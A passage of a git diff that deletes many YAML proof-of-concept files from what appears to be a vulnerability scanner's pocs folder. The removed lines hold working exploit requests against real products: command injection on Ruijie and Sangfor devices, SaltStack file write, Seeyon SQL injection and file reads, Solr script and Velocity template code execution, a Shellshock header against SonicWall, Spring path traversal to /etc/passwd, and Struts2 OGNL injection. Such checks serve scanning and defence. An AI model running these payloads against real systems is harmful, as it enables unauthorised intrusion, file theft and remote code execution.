Z3Vlc3Q6Z3Vlc3Q= - body: | - command=show webmaster user&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant. - expression: | - response.status == 200 && response.body.bcontains(bytes("webmaster level 2 username guest password guest")) -detail: - author: abbin777 - links: - - http://wiki.peiqi.tech/PeiQi_Wiki/%E7%BD%91%E7%BB%9C%E8%AE%BE%E5%A4%87%E6%BC%8F%E6%B4%9E/%E9%94%90%E6%8D%B7/%E9%94%90%E6%8D%B7NBR%201300G%E8%B7%AF%E7%94%B1%E5%99%A8%20%E8%B6%8A%E6%9D%83CLI%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html diff --git a/WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml b/WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml deleted file mode 100644 index 579c15e..0000000 --- a/WebScan/pocs/ruijie-rce-cnvd-2021-09650.yml +++ /dev/null @@ -1,20 +0,0 @@ -name: poc-yaml-ruijie-rce-cnvd-2021-09650 -set: - r1: randomLowercase(9) -rules: - - method: POST - path: /guest_auth/guestIsUp.php - body: mac = 1 & ip = 127.0.0.1 | id > {{r1}}.txt - follow_redirects: false - expression: | - response.status == 200 - - method: GET - path: /guest_auth/{{r1}}.txt - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"uid") -detail: - author: jdr - info: CNVD-2021-09650(Ruijie-EWEB网管系统 RCE) - links: - - https://github.com/opsxcq/exploit-CVE-2014-6271/ \ No newline at end of file diff --git a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml b/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml deleted file mode 100644 index 6aa046e..0000000 --- a/WebScan/pocs/ruijie-uac-cnvd-2021-14536.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-ruijie-uac-cnvd-2021-14536 -rules: - - method: GET - path: /login.php - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(b"RG-UAC登录页面") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body) -detail: - author: jweny(https://github.com/jweny) - links: - - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247483972&idx=1&sn=b51678c6206a533330b0279454335065 \ No newline at end of file diff --git a/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml b/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml deleted file mode 100644 index 63f6a1b..0000000 --- a/WebScan/pocs/saltstack-cve-2021-25282-file-write.yml +++ /dev/null @@ -1,22 +0,0 @@ -name: poc-yaml-saltstack-cve-2021-25282-file-write -set: - r1: randomLowercase(5) -rules: - - method: GET - path: /run - follow_redirects: false - expression: | - response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"wheel_async") && response.body.bcontains(b"runner_async") - - method: POST - path: /run - headers: - Content-type: application/json - body: >- - {"eauth":"auto","client":"wheel_async","fun":"pillar_roots.write","data":"{{r1}}","path":"../../../../../../../../../tmp/{{r1}}"} - follow_redirects: false - expression: | - response.status == 200 && response.content_type.icontains("application/json") && "salt/wheel/d*".bmatches(response.body) -detail: - author: jweny(https://github.com/jweny) - links: - - https://www.anquanke.com/post/id/232748 \ No newline at end of file diff --git a/WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml b/WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml deleted file mode 100644 index 43debed..0000000 --- a/WebScan/pocs/sangfor-edr-arbitrary-admin-login.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-sangfor-edr-arbitrary-admin-login -rules: - - method: GET - path: /ui/login.php?user=admin - follow_redirects: false - expression: > - response.status == 302 && - response.body.bcontains(b"/download/edr_installer_") && - response.headers["Set-Cookie"] != "" -detail: - author: hilson - links: - - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA diff --git a/WebScan/pocs/sangfor-edr-cssp-rce.yml b/WebScan/pocs/sangfor-edr-cssp-rce.yml deleted file mode 100644 index 4dafccb..0000000 --- a/WebScan/pocs/sangfor-edr-cssp-rce.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-sangfor-edr-cssp-rce -rules: - - method: POST - path: /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 - headers: - Content-Type: application/x-www-form-urlencoded - body: >- - {"params":"w=123\"'1234123'\"|id"} - expression: > - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"uid=0(root)") -detail: - author: x1n9Qi8 - Affected Version: "Sangfor EDR 3.2.17R1/3.2.21" - links: - - https://www.cnblogs.com/0day-li/p/13650452.html diff --git a/WebScan/pocs/sangfor-edr-tool-rce.yml b/WebScan/pocs/sangfor-edr-tool-rce.yml deleted file mode 100644 index 5a97ff7..0000000 --- a/WebScan/pocs/sangfor-edr-tool-rce.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-sangfor-edr-tool-rce -set: - r1: randomLowercase(8) - r2: randomLowercase(8) -rules: - - method: GET - path: "/tool/log/c.php?strip_slashes=printf&host={{r1}}%25%25{{r2}}" - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(r1 + "%" + r2)) -detail: - author: cookie - links: - - https://edr.sangfor.com.cn/ diff --git a/WebScan/pocs/seeyon-a6-employee-info-leak.yml b/WebScan/pocs/seeyon-a6-employee-info-leak.yml deleted file mode 100644 index b655ab7..0000000 --- a/WebScan/pocs/seeyon-a6-employee-info-leak.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-seeyon-a6-employee-info-leak -rules: - - method: GET - path: /yyoa/DownExcelBeanServlet?contenttype=username&contentvalue=&state=1&per_id=0 - expression: - response.status == 200 && response.body.bcontains(b"[Content_Types].xml") && response.body.bcontains(b"Excel.Sheet") -detail: - author: sakura404x - version: 致远A6 - links: - - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3351.md \ No newline at end of file diff --git a/WebScan/pocs/seeyon-a6-test-jsp-sql.yml b/WebScan/pocs/seeyon-a6-test-jsp-sql.yml deleted file mode 100644 index fde5f2a..0000000 --- a/WebScan/pocs/seeyon-a6-test-jsp-sql.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-seeyon-a6-test-jsp-sql -set: - rand: randomInt(200000000, 210000000) -rules: - - method: GET - path: /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5({{rand}})) - expression: - response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) -detail: - author: sakura404x - version: 致远A6 - links: - - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3346.md \ No newline at end of file diff --git a/WebScan/pocs/seeyon-ajax-unauthorized-access.yml b/WebScan/pocs/seeyon-ajax-unauthorized-access.yml deleted file mode 100644 index 92ce028..0000000 --- a/WebScan/pocs/seeyon-ajax-unauthorized-access.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-seeyon-ajax-unauthorized-access -rules: - - method: GET - path: /seeyon/thirdpartyController.do.css/..;/ajax.do - expression: | - response.status == 200 && response.body.bcontains(bytes("java.lang.NullPointerException:null")) - - method: GET - path: /seeyon/personalBind.do.jpg/..;/ajax.do?method=ajaxAction&managerName=mMOneProfileManager&managerMethod=getOAProfile - expression: | - response.status == 200 && response.body.bcontains(bytes("MMOneProfile")) && response.body.bcontains(bytes("productTags")) && response.body.bcontains(bytes("serverIdentifier")) && response.content_type.contains("application/json") - -detail: - author: x1n9Qi8 - links: - - https://mp.weixin.qq.com/s/bHKDSF7HWsAgQi9rTagBQA - - https://buaq.net/go-53721.html diff --git a/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml b/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml deleted file mode 100644 index f6373ff..0000000 --- a/WebScan/pocs/seeyon-cnvd-2020-62422-readfile.yml +++ /dev/null @@ -1,11 +0,0 @@ -name: poc-yaml-seeyon-cnvd-2020-62422-readfile -rules: - - method: GET - path: /seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties - follow_redirects: false - expression: response.status == 200 && response.content_type.icontains("application/x-msdownload") && response.body.bcontains(b"ctpDataSource.password") -detail: - author: Aquilao(https://github.com/Aquilao) - info: seeyon readfile(CNVD-2020-62422) - links: - - https://www.cnvd.org.cn/flaw/show/CNVD-2020-62422 diff --git a/WebScan/pocs/seeyon-session-leak.yml b/WebScan/pocs/seeyon-session-leak.yml deleted file mode 100644 index 4722203..0000000 --- a/WebScan/pocs/seeyon-session-leak.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-seeyon-session-leak -rules: - - method: GET - path: /yyoa/ext/https/getSessionList.jsp?cmd=getAll - expression: - response.status == 200 && response.body.bcontains(b"\r\n\r\n") -detail: - author: sakura404x - links: - - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3345.md \ No newline at end of file diff --git a/WebScan/pocs/seeyon-setextno-jsp-sql.yml b/WebScan/pocs/seeyon-setextno-jsp-sql.yml deleted file mode 100644 index 84b6acb..0000000 --- a/WebScan/pocs/seeyon-setextno-jsp-sql.yml +++ /dev/null @@ -1,13 +0,0 @@ -name: poc-yaml-seeyon-setextno-jsp-sql -set: - rand: randomInt(200000000, 210000000) -rules: - - method: GET - path: /yyoa/ext/trafaxserver/ExtnoManage/setextno.jsp?user_ids=(17)%20union%20all%20select%201,2,@@version,md5({{rand}})%23 - expression: - response.status == 200 && response.body.bcontains(bytes(md5(string(rand)))) -detail: - author: sakura404x - version: 致远A6 - links: - - https://github.com/apachecn/sec-wiki/blob/c73367f88026f165b02a1116fe1f1cd2b8e8ac37/doc/unclassified/zhfly3348.md \ No newline at end of file diff --git a/WebScan/pocs/seeyon-unauthoried.yml b/WebScan/pocs/seeyon-unauthoried.yml deleted file mode 100644 index a0777ec..0000000 --- a/WebScan/pocs/seeyon-unauthoried.yml +++ /dev/null @@ -1,19 +0,0 @@ -name: poc-yaml-seeyon-unauthoried -rules: - - method: POST - path: "/seeyon/thirdpartyController.do" - expression: "true" - body: | - method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4 - search: >- - JSESSIONID=(?P.+?) - - method: GET - path: "/seeyon/main.do" - headers: - Cookie: JSESSIONID={{session}} - expression: | - response.status == 200 && response.body.bcontains(b"当前已登录了一个用户,同一窗口中不能登录多个用户") -detail: - author: whami-root(https://github.com/whami-root) - links: - - https://github.com/whami-root \ No newline at end of file diff --git a/WebScan/pocs/showdoc-uploadfile.yml b/WebScan/pocs/showdoc-uploadfile.yml deleted file mode 100644 index 0921919..0000000 --- a/WebScan/pocs/showdoc-uploadfile.yml +++ /dev/null @@ -1,25 +0,0 @@ -name: poc-yaml-showdoc-uploadfile -set: - r1: randomLowercase(4) - r2: randomLowercase(4) -rules: - - method: POST - path: /index.php?s=/home/page/uploadImg - headers: - Content-Type: "multipart/form-data; boundary=--------------------------835846770881083140190633" - follow_redirects: false - body: "----------------------------835846770881083140190633\nContent-Disposition: form-data; name=\"editormd-image-file\"; filename=\"{{r1}}.<>php\"\nContent-Type: text/plain\n\n\n----------------------------835846770881083140190633--" - expression: | - response.status == 200 && response.body.bcontains(b"success") - search: | - (?P\d{4}-\d{2}-\d{2})\\/(?P[a-f0-9]+\.php) - - method: GET - path: /Public/Uploads/{{date}}/{{file}} - follow_redirects: false - expression: | - response.status == 200 && response.body.bcontains(bytes(r2)) -detail: - author: White(https://github.com/WhiteHSBG) - Affected Version: "showdoc <= 2.8.6" - links: - - https://github.com/star7th/showdoc/pull/1059 \ No newline at end of file diff --git a/WebScan/pocs/solr-cve-2019-0193.yml b/WebScan/pocs/solr-cve-2019-0193.yml deleted file mode 100644 index 28e4b75..0000000 --- a/WebScan/pocs/solr-cve-2019-0193.yml +++ /dev/null @@ -1,30 +0,0 @@ -name: poc-yaml-solr-cve-2019-0193 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: GET - path: /solr/admin/cores?wt=json - follow_redirects: false - expression: response.status == 200 && response.body.bcontains(b"responseHeader") - search: '"name":"(?P.*?)"' - - method: POST - path: >- - /solr/{{core}}/dataimport?command=full-import&debug=true&wt=json&indent=true&verbose=false&clean=false&commit=false&optimize=false&dataConfig=%3CdataConfig%3E%0D%0A%3CdataSource%20name%3D%22streamsrc%22%20type%3D%22ContentStreamDataSource%22%20loggerLevel%3D%22DEBUG%22%20%2F%3E%0D%0A%3Cscript%3E%3C!%5BCDATA%5B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20function%20execute(row)%20%20%20%20%7B%0D%0Arow.put(%22id%22,{{r1}}*{{r2}})%3B%0D%0Areturn%20row%3B%0D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0D%0A%20%20%20%20%20%20%20%20%5D%5D%3E%3C%2Fscript%3E%0D%0A%3Cdocument%3E%0D%0A%20%20%20%20%3Centity%0D%0A%20%20%20%20%20%20%20%20stream%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20name%3D%22streamxml%22%0D%0A%20%20%20%20%20%20%20%20datasource%3D%22streamsrc1%22%0D%0A%20%20%20%20%20%20%20%20processor%3D%22XPathEntityProcessor%22%0D%0A%20%20%20%20%20%20%20%20rootEntity%3D%22true%22%0D%0A%20%20%20%20%20%20%20%20forEach%3D%22%2Fbooks%2Fbook%22%0D%0A%20%20%20%20%20%20%20%20transformer%3D%22script%3Aexecute%22%20%3E%0D%0A%09%09%09%3Cfield%20column%3D%22id%22%20name%3D%22id%22%2F%3E%0D%0A%20%20%20%20%3C%2Fentity%3E%0D%0A%3C%2Fdocument%3E%0D%0A%3C%2FdataConfig%3E - headers: - Content-Type: text/html - body: |- - - - - - - follow_redirects: false - expression: response.status == 200 && response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: fnmsd(https://github.com/fnmsd) - solr_version: '<8.1.12' - vulnpath: '/solr/{{core}}/dataimport' - description: 'Apache Solr DataImportHandler Remote Code Execution Vulnerability(CVE-2019-0193)' - links: - - https://github.com/vulhub/vulhub/tree/master/solr/CVE-2019-0193 diff --git a/WebScan/pocs/solr-fileread1.yml b/WebScan/pocs/solr-fileread1.yml deleted file mode 100644 index 0b92afd..0000000 --- a/WebScan/pocs/solr-fileread1.yml +++ /dev/null @@ -1,25 +0,0 @@ -name: poc-yaml-solr-fileread1 -rules: - - method: GET - path: "/solr/admin/cores?indexInfo=false&wt=json" - expression: response.status == 200 && response.body.bcontains(b"responseHeader") - search: >- - "name":"(?P.+?)" - - method: POST - path: "/solr/{{core}}/config" - body: | - {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - expression: | - response.body.bcontains(b"responseHeader") - - method: POST - path: "/solr/{{core}}/debug/dump?param=ContentStreams" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - stream.url=file:///etc/passwd - expression: | - response.status == 200 && r'root:[x*]:0:0:'.bmatches(response.body) -detail: - author: whami-root(https://github.com/whami-root) - links: - - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186 \ No newline at end of file diff --git a/WebScan/pocs/solr-fileread2.yml b/WebScan/pocs/solr-fileread2.yml deleted file mode 100644 index 60def9e..0000000 --- a/WebScan/pocs/solr-fileread2.yml +++ /dev/null @@ -1,25 +0,0 @@ -name: poc-yaml-solr-fileread2 -rules: - - method: GET - path: "/solr/admin/cores?indexInfo=false&wt=json" - expression: "true" - search: >- - "name":"(?P.+?)" - - method: POST - path: "/solr/{{core}}/config" - body: | - {"set-property" : {"requestDispatcher.requestParsers.enableRemoteStreaming":true}} - expression: | - response.body.bcontains(b"responseHeader") - - method: POST - path: "/solr/{{core}}/debug/dump?param=ContentStreams" - headers: - Content-Type: application/x-www-form-urlencoded - body: | - stream.url=file:///c://windows/win.ini - expression: | - response.status == 200 && response.body.bcontains(b"for 16-bit app support") -detail: - author: whami-root(https://github.com/whami-root) - links: - - https://mp.weixin.qq.com/s?__biz=Mzg3NDU2MTg0Ng==&mid=2247484117&idx=1&sn=2fdab8cbe4b873f8dd8abb35d935d186 \ No newline at end of file diff --git a/WebScan/pocs/solr-velocity-template-rce.yml b/WebScan/pocs/solr-velocity-template-rce.yml deleted file mode 100644 index 4529340..0000000 --- a/WebScan/pocs/solr-velocity-template-rce.yml +++ /dev/null @@ -1,38 +0,0 @@ -name: poc-yaml-solr-velocity-template-rce -set: - r1: randomInt(20000, 40000) - r2: randomInt(20000, 40000) -rules: - - method: GET - path: "/solr/admin/cores?wt=json" - follow_redirects: false - expression: response.status == 200 && response.body.bcontains(b"responseHeader") - search: | - "name":"(?P[^"]+)" - - method: POST - path: >- - /solr/{{core}}/config - headers: - Content-Type: application/json - body: |- - { - "update-queryresponsewriter": { - "startup": "test", - "name": "velocity", - "class": "solr.VelocityResponseWriter", - "template.base.dir": "", - "solr.resource.loader.enabled": "true", - "params.resource.loader.enabled": "true" - } - } - expression: response.status == 200 - - method: GET - path: "/solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set(%24c%3D{{r1}}%20*%20{{r2}})%24c" - follow_redirects: false - expression: response.body.bcontains(bytes(string(r1 * r2))) -detail: - author: Loneyer - description: 'Apache Solr RCE via Velocity template' - links: - - https://gist.githubusercontent.com/s00py/a1ba36a3689fa13759ff910e179fc133/raw/fae5e663ffac0e3996fd9dbb89438310719d347a/gistfile1.txt - - https://cert.360.cn/warning/detail?id=fba518d5fc5c4ed4ebedff1dab24caf2 diff --git a/WebScan/pocs/sonicwall-ssl-vpn-rce.yml b/WebScan/pocs/sonicwall-ssl-vpn-rce.yml deleted file mode 100644 index 4b00104..0000000 --- a/WebScan/pocs/sonicwall-ssl-vpn-rce.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-sonicwall-ssl-vpn-rce -set: - r1: randomInt(40000, 44800) - r2: randomInt(1140000, 1144800) -rules: - - method: GET - path: /cgi-bin/jarrewrite.sh - follow_redirects: false - headers: - X-Test: () { :; }; echo ; /bin/bash -c 'expr {{r1}} - {{r2}}' - expression: | - response.status == 200 && response.body.bcontains(bytes(string(r1 - r2))) -detail: - author: sharecast - links: - - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ diff --git a/WebScan/pocs/spring-actuator-heapdump-file.yml b/WebScan/pocs/spring-actuator-heapdump-file.yml deleted file mode 100644 index db481ae..0000000 --- a/WebScan/pocs/spring-actuator-heapdump-file.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-spring-actuator-heapdump-file -rules: - - method: HEAD - path: /actuator/heapdump - follow_redirects: true - expression: | - response.status == 200 && response.content_type.contains("application/octet-stream") -detail: - author: AgeloVito - info: spring-actuator-heapdump-file - links: - - https://www.cnblogs.com/wyb628/p/8567610.html diff --git a/WebScan/pocs/spring-cloud-cve-2020-5405.yml b/WebScan/pocs/spring-cloud-cve-2020-5405.yml deleted file mode 100644 index f11a403..0000000 --- a/WebScan/pocs/spring-cloud-cve-2020-5405.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-spring-cloud-cve-2020-5405 -rules: - - method: GET - path: >- - /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf - follow_redirects: true - expression: | - response.status == 200 && response.body.bcontains(bytes("This file is managed by man:systemd-resolved(8). Do not edit.")) - -detail: - version: <= 2.1.6, 2.2.1 - author: kingkk(https://www.kingkk.com/) - links: - - https://pivotal.io/security/cve-2020-5405 - - https://github.com/spring-cloud/spring-cloud-config \ No newline at end of file diff --git a/WebScan/pocs/spring-cloud-cve-2020-5410.yml b/WebScan/pocs/spring-cloud-cve-2020-5410.yml deleted file mode 100644 index 026b337..0000000 --- a/WebScan/pocs/spring-cloud-cve-2020-5410.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-spring-cloud-cve-2020-5410 -rules: - - method: GET - path: >- - /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) -detail: - author: Soveless(https://github.com/Soveless) - Affected Version: "Spring Cloud Config 2.2.x < 2.2.3, 2.1.x < 2.1.9" - links: - - https://xz.aliyun.com/t/7877 \ No newline at end of file diff --git a/WebScan/pocs/spring-cve-2016-4977.yml b/WebScan/pocs/spring-cve-2016-4977.yml deleted file mode 100644 index 5df7d07..0000000 --- a/WebScan/pocs/spring-cve-2016-4977.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-spring-cve-2016-4977 -set: - r1: randomInt(40000, 44800) - r2: randomInt(40000, 44800) -rules: - - method: GET - path: /oauth/authorize?response_type=${{{r1}}*{{r2}}}&client_id=acme&scope=openid&redirect_uri=http://test - follow_redirects: false - expression: > - response.body.bcontains(bytes(string(r1 * r2))) -detail: - Affected Version: "spring(2.0.0-2.0.9 1.0.0-1.0.5)" - author: hanxiansheng26(https://github.com/hanxiansheng26) - links: - - https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977 diff --git a/WebScan/pocs/spring-heapdump-file.yml b/WebScan/pocs/spring-heapdump-file.yml deleted file mode 100644 index 148930d..0000000 --- a/WebScan/pocs/spring-heapdump-file.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-spring-heapdump-file -rules: - - method: HEAD - path: /heapdump - follow_redirects: true - expression: | - response.status == 200 && response.content_type.contains("application/octet-stream") -detail: - author: AgeloVito - info: spring-heapdump-file - links: - - https://www.cnblogs.com/wyb628/p/8567610.html diff --git a/WebScan/pocs/springboot-env-unauth.yml b/WebScan/pocs/springboot-env-unauth.yml deleted file mode 100644 index 5ddda4f..0000000 --- a/WebScan/pocs/springboot-env-unauth.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: poc-yaml-springboot-env-unauth -rules: - - method: GET - path: /env - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") -detail: - links: - - https://github.com/LandGrey/SpringBootVulExploit diff --git a/WebScan/pocs/springboot-env-unauth2.yml b/WebScan/pocs/springboot-env-unauth2.yml deleted file mode 100644 index 6a78661..0000000 --- a/WebScan/pocs/springboot-env-unauth2.yml +++ /dev/null @@ -1,9 +0,0 @@ -name: poc-yaml-springboot-env-unauth -rules: - - method: GET - path: /actuator/env - expression: | - response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"java.version") && response.body.bcontains(b"os.arch") -detail: - links: - - https://github.com/LandGrey/SpringBootVulExploit diff --git a/WebScan/pocs/springcloud-cve-2019-3799.yml b/WebScan/pocs/springcloud-cve-2019-3799.yml deleted file mode 100644 index 821028f..0000000 --- a/WebScan/pocs/springcloud-cve-2019-3799.yml +++ /dev/null @@ -1,14 +0,0 @@ -name: poc-yaml-springcloud-cve-2019-3799 -rules: - - method: GET - path: >- - /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd - follow_redirects: true - expression: | - response.status == 200 && "root:[x*]:0:0:".bmatches(response.body) - -detail: - version: <2.1.2, 2.0.4, 1.4.6 - author: Loneyer - links: - - https://github.com/Loneyers/vuldocker/tree/master/spring/CVE-2019-3799 diff --git a/WebScan/pocs/struts2-045-1.yml b/WebScan/pocs/struts2-045-1.yml deleted file mode 100644 index d2dc423..0000000 --- a/WebScan/pocs/struts2-045-1.yml +++ /dev/null @@ -1,15 +0,0 @@ -name: poc-yaml-struts2_045-1 -set: - r1: randomInt(800, 1000) - r2: randomInt(800, 1000) -rules: - - method: GET - path: / - headers: - Content-Type: ${#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("Keyvalue",{{r1}}*{{r2}})}.multipart/form-data - follow_redirects: true - expression: | - "Keyvalue" in response.headers && response.headers["Keyvalue"].contains(string(r1 * r2)) -detail: - author: shadown1ng(https://github.com/shadown1ng) - diff --git a/WebScan/pocs/struts2-045-2.yml b/WebScan/pocs/struts2-045-2.yml deleted file mode 100644 index 18769e6..0000000 --- a/WebScan/pocs/struts2-045-2.yml +++ /dev/null @@ -1,12 +0,0 @@ -name: poc-yaml-struts2_045-2 -rules: - - method: GET - path: / - headers: - Content-Type: "%{(#test='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType('text/html;charset=UTF-8')).(#res.getWriter().print('struts2_security_')).(#res.getWriter().print('check')).(#res.getWriter().flush()).(#res.getWriter().close())}" - follow_redirects: true - expression: | - response.body.bcontains(b"struts2_security_check") -detail: - author: shadown1ng(https://github.com/shadown1ng) - diff --git a/WebScan/pocs/struts2-046-1.yml b/WebScan/pocs/struts2-046-1.yml deleted file mode 100644 index f0ec629..0000000 --- a/WebScan/pocs/struts2-046-1.yml +++ /dev/null @@ -1,16 +0,0 @@ -name: poc-yaml-struts2_046-1 -set: - r1: b"-----------------------------\r\nContent-Disposition:\x20form-data;\x20name=\"test\";\x20filename=\"%{(#_=\'multipart/form-data\').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context[\'com.opensymphony.xwork2.ActionContext.container\']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=@org.apache.struts2.ServletActionContext@getRequest()).(#res=@org.apache.struts2.ServletActionContext@getResponse()).(#res.setContentType(\'text/html;charset=UTF-8\')).(#res.getWriter().print(\'struts2_security_\')).(#res.getWriter().print(\'check\')).(#res.getWriter().flush()).(#res.getWriter().close())}\x00b\"\r\nContent-Type:\x20text/plain\r\n\r\n\r\n-----------------------------" -rules: - - method: POST - path: / - headers: - Content-Type: multipart/form-data; boundary=--------------------------- - follow_redirects: true - body: | - {{r1}} - expression: | - response.body.bcontains(b"struts2_security_check") -detail: - author: shadown1ng(https://github.com/shadown1ng) - diff --git a/WebScan/pocs/swagger-ui-unauth-No1.yml b/WebScan/pocs/swagger-ui-unauth-No1.yml deleted file mode 100644 index 5971c53..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No1.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth1 -rules: - - method: GET - path: /swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No2.yml b/WebScan/pocs/swagger-ui-unauth-No2.yml deleted file mode 100644 index a3f663e..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No2.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth2 -rules: - - method: GET - path: /api/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No3.yml b/WebScan/pocs/swagger-ui-unauth-No3.yml deleted file mode 100644 index 66e81f1..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No3.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth3 -rules: - - method: GET - path: /service/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No4.yml b/WebScan/pocs/swagger-ui-unauth-No4.yml deleted file mode 100644 index e109fc9..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No4.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth4 -rules: - - method: GET - path: /web/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No5.yml b/WebScan/pocs/swagger-ui-unauth-No5.yml deleted file mode 100644 index f111855..0000000 --- a/WebScan/pocs/swagger-ui-unauth-No5.yml +++ /dev/null @@ -1,10 +0,0 @@ -name: poc-yaml-swagger-ui-unauth5 -rules: - - method: GET - path: /swagger/swagger-ui.html - expression: | - response.status == 200 && response.body.bcontains(b"Swagger UI") && response.body.bcontains(b"swagger-ui.min.js") -detail: - author: AgeloVito - links: - - https://blog.csdn.net/u012206617/article/details/109107210 diff --git a/WebScan/pocs/swagger-ui-unauth-No6.yml b/WebScan/pocs/swagger-ui-unauth-No6.yml deleted file mode 100644 index 